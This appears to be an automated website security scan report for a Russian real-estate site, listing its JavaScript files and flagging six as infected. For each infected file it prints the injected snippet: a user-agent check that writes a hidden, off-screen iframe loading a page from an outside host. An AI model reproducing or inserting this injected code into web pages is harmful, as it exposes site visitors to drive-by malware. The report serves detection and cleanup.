Scanned pages/files
Request | Server response | Status |
http://www.tatar-realty.ru/ | 200 OK Content-Length: 29038 Content-Type: text/html | clean |
http://www.tatar-realty.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 597 Content-Type: application/x-javascript | clean |
http://www.tatar-realty.ru/media/system/js/core.js | 200 OK Content-Length: 5383 Content-Type: application/x-javascript | clean |
http://www.tatar-realty.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 597 Content-Type: application/x-javascript | clean |
http://www.tatar-realty.ru/media/system/js/modal.js | 200 OK Content-Length: 10331 Content-Type: application/x-javascript | clean |
http://www.tatar-realty.ru//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/ | 404 Not Found Content-Length: 955 Content-Type: text/html | clean |
http://www.tatar-realty.ru/test404page.js | 404 Not Found Content-Length: 303 Content-Type: text/html | clean |
http://www.tatar-realty.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 7423 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Antivirus reports:
| ||
http://www.tatar-realty.ru/media/system/js/caption.js | 200 OK Content-Length: 1328 Content-Type: application/x-javascript | clean |
http://www.tatar-realty.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 597 Content-Type: application/x-javascript | clean |
http://www.tatar-realty.ru/cache/widgetkit/widgetkit-07424695.js | 200 OK Content-Length: 14205 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window["WIDGETKIT_URL"]="/media/widgetkit"; function wk_ajax_render_url(widgetid){return"/component/widgetkit/?tmpl=raw&id="+widgetid} function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound- $widgetkit.trans.addDic({"LESS_THAN_A_MINUTE_AGO":"less than a minute ago","ABOUT_A_MINUTE_AGO":"about a minute ago","X_MINUTES_AGO":"%s minutes ago","ABOUT_AN_HOUR_AGO":"about an hour ago","X_HOURS_AGO":"about %s hours ago","ONE_DAY_AGO":"1 day ago","X_DAYS_AGO":"%s days ago"}); Antivirus reports:
| ||
http://www.tatar-realty.ru/templates/yoo_revista/warp/js/warp.js | 200 OK Content-Length: 7447 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( a).bind("blur.placeholder",c).trigger("blur.placeholder").end()};f(function(){f("form").bind("submit.placeholder",function(){var b=f(".placeholder",this).each(a);setTimeout(function(){b.each(c)},10)})});f(window).bind("unload.placeholder",function(){f(".placeholder").val("")})})(jQuery); Antivirus reports:
| ||
http://www.tatar-realty.ru/templates/yoo_revista/warp/js/accordionmenu.js | 200 OK Content-Length: 2126 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( g[0]:null;return this.each(function(){var c=d(this);if(a.prototype[b]&&c.data(a.prototype.name)&&b!="initialize")c.data(a.prototype.name)[b].apply(c.data(a.prototype.name),Array.prototype.slice.call(g,1));else if(!b||d.isPlainObject(b)){var f=new a;a.prototype.initialize&&f.initialize.apply(f,d.merge([c],g));c.data(a.prototype.name,f)}else d.error("Method "+b+" does not exist on jQuery."+a.name)})}})(jQuery); Antivirus reports:
| ||
http://www.tatar-realty.ru/templates/yoo_revista/warp/js/dropdownmenu.js | 200 OK Content-Length: 5989 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( new e;e.prototype.initialize&&g.initialize.apply(g,b.merge([a],o));a.data(e.prototype.name,g)}else b.error("Method "+j+" does not exist on jQuery."+e.name)})}})(jQuery); Antivirus reports:
| ||
http://www.tatar-realty.ru/templates/yoo_revista/js/template.js | 200 OK Content-Length: 1823 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://raficavulerta.rodrigoillarraga.com.ar/kajetabulta15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas( $('#bottom-b .grid-h').matchHeight('.deepest'); $('#bottom-c .grid-h').matchHeight('.deepest'); $('#innertop .grid-h').matchHeight('.deepest'); $('#innerbottom .grid-h').matchHeight('.deepest'); $('#maininner, #sidebar-a, #sidebar-b').matchHeight(); $('.wrapper').css("min-height", $(window).height()); }; matchHeight(); $(window).bind("load", matchHeight); }); })(jQuery); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tatar-realty.ru
Result:
GET / HTTP/1.1
Host: tatar-realty.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tatar-realty.ru
Referer: http://www.google.com/search?q=tatar-realty.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tatar-realty.ru
Referer: http://www.google.com/search?q=tatar-realty.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tatar-realty.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tatar-realty.ru/
Result: tatar-realty.ru is not infected or malware details are not published yet.
Result: tatar-realty.ru is not infected or malware details are not published yet.